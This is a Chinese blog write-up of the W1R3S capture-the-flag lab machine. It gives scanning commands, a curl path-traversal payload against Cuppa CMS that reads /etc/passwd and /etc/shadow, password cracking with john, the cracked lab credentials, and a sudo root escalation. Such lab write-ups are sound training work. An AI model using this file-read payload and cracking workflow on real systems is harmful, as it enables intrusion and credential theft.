w1r3s-editable靶机复现

于 2024-08-06 14:51:47 发布
阅读量229 收藏 5
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/140955910
版权

靶机设置

靶机模式设置为NAT模式

靶机IP发现

nmap 192.168.112.0/24

发现靶机IP为192.168.112.168

目录扫描

80端口开放,进行目录扫描

dirsearch 192.168.112.168

访问浏览器页面

没什么信息,进行目录拼接

目录拼接

拼接/administrator

发现可以创建数据库,但是不知道其账号密码,发现为Cuppa CMS框架,尝试寻找其EXP

msfconsole

searchsploit cuppa

searchsploit -m php/webapps/25971.txt

导入该exp

去网页上尝试访问该url

发现无回显

尝试下载页面内容

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.112.168/administrator/alerts/alertConfigField.php

下载成功

在文件中发现了 w1r3s 用户,去想办法获取密码

用同样的方法获得保存密码的shadow文件试试,结果发现了 root 、www-data、 w1r3s用户的密

把密码进行john爆破

放在一个文件中

vim password.txt

john password.txt

发现了两组密码

账号:www-data

密码:www-data

账号:w1r3s

密码:computer

拼接/wordpress/wp-login.php

发现是wordpress登录页面,尝试admin admin 弱口令登录

登录成功,但是页面无回显

ssh连接

因为开放了22端口

使用刚才获得的账号密码进行连接

登录成功

查看发现为普通用户

提权

sudo -l

查看免密操作

发现什么都可以操作,直接sudo su

提权成功

cd /root

ls

cat flag.txt

发现flag文件

CcHKer
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
w1r3s-editable渗透笔记
weixin_73094474的博客
03-01 1625
做好信息收集,多收集一些信息对渗透成功有很大的作用,一些常见的端口渗透,目录扫描等对第三方管理系统或者是其他系统做重点渗透,查看是否有对应的poc或exp学会使用john开膛用户密码sudo -l的简单提权。
Vulnhub-w1r3s-editable
路漫漫其修远兮
01-18 445
目录扫描,最开始使用御剑扫描,扫描道了wordpress但是访问就重定向,后面使用dirb工具扫描到了cuppa cms。读取/etc/shadow文件,这个文件是存放加密后的密码文件。进行信息收集发现sudo可以直接以root权限运行bash。端口扫描,ftp允许匿名登录,但是没有得到什么有用的线索。使用searchsploit cuppa查找漏洞。使用john工具进行爆破最后得到了两个用户的密码。一共有三个账号的密码。
【每日打靶练习】靶机渗透实操-W1R3S(易)
leo788的博客
12-29 1010
试试读一下/etc/shadow文件,该文件存放用户名密码,得到了很像密码的两部分信息,分别对应着www-data用户-加密密码,w1r3s用户-加密密码,使用最小速率为10000来扫描靶机ip开放端口,端口数量为65536个,所以设置10000的速率来进行扫描,其默认是tcp扫描。对页面上的信息cuppa cms进行匹配,获取到一条信息xxx.txt,检查一下,发现cuppa cms这个存在文件包含漏洞。开放端口有:21-ftp,22-ssh,80-http,3306-mysql。
红队渗透靶场之W1R3S靶场(超详细!)
xf555er的博客
11-24 3306
- nmap的基本使用 - 目录爆破工具的使用 - CMS漏洞的利用 - Linux用户的简单提权
渗透项目(五):W1R3S
Ays.Ie的博客
10-29 1540
本篇文章是作者第5个渗透项目,具体记录了渗透项目考察的知识点,渗透过程。其中的文件包含漏洞,后续会更新~
w1r3s--靶机实操详解
qq_61802750的博客
08-05 546
把localhost指向我们的kali,再做一个实验,也许localhost不允许指定非本机ip,指向靶机ip可能不行,所以我们再创建一个域名来进行访问。看到已经列出了passwd的内容,每一条用户数据的第二段都是X,证明密码是以哈希的方式存在了shadow文件中,我们去找shadow文件。下面的字符,我们通过观察可以发现,它是上下颠倒加上前后倒序,kali里没有工具可以解密,我们可以百度进行查询。如果创建的域名可以访问的话,而localhost不行,那就是现在kali的环境不允许这样操作了。
bootstrap-table-editable.js+bootstrap-editable.js+bootstrap-editable.css
11-09
压缩包里面有: 1.bootstrap-table-editable.js 2.bootstrap-editable.js 3.bootstrap-editable.css 用于bootstrap table实现x-editable的行单元格编辑
JS表格组件BootstrapTable行内编辑解决方案x-editable
11-23
【JS表格组件BootstrapTable行内编辑解决方案x-editable】 在前端开发中,表格组件是常见的数据展示工具,而BootstrapTable是一款强大的JS表格组件,它提供了丰富的功能,包括行内编辑。行内编辑允许用户直接在表格...
bootstrap-table-editable.js
06-28
5. **事件监听**:提供了一系列的事件,如 `editable-init`、`editable-save`、`editable-error` 等,开发者可以通过监听这些事件来实现自定义逻辑,如在数据保存前进行额外的校验,或者在数据保存失败时显示错误...
bootstrap-editable.zip
07-27
可编辑bootstrap-table及相关组件:bootstrap3、bootstrap-table相关、bootstrap-table-editable.js、bootstrap-editable.js、bootstrap-editable.css; 配合起来,可以实现可编辑bootstrap-table列表。代码实现: ...
bootstrap-table可编辑下拉框editable js及css及bootstrap-table-editable.js以及使用实例
12-06
对于下拉框编辑,我们还需要指定`data-editable-type="select"`,并提供`source`属性来定义下拉框的选项。 `bootstrap-table-editable.js`是Bootstrap Table的扩展,它使得表格中的单元格可以变为可编辑状态,并且...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8456
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ListView 中的item随意拖动.zip
09-12
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
Todo应用-基于MySQL和Hibernate实现.zip
09-12
这是一个基于Spring Boot、Hibernate、Rest Controller、MySQL和Maven技术的待办事项(Todo)项目。该项目是一个使用Spring Boot的简单待办事项列表应用程序,采用Spring JPA和MySQL进行数据存储,使用Spring MVC进行渲染。项目结构清晰,包含配置MySQL数据库、构建和运行样本等步骤。开发者可以通过修改配置文件来适应自己的MySQL实例,并通过本地服务器运行应用。该项目为待办事项管理提供了一个基本的Web解决方案。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
开家可乐店bcm4文件
09-12
此文件请下载源码编辑器后再使用,否则无法打开,请尽量不要更改源代码,因为此文件更改代码后可能功能不同,版本号:v2.1
阳光酒店管理系统(javaapplet+SQL).zip
09-12
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
java基于SpringBoot+vue 校园新闻管理系统源码 带毕业论文
最新发布
09-12
1、开发环境:SpringBoot框架;内含Mysql数据库;VUE技术;内含说明文档 2、需要项目部署的可以私信 3、项目代码都经过严格调试,代码没有任何bug! 4、该资源包括项目的全部源码,下载可以直接使用! 5、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 6、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值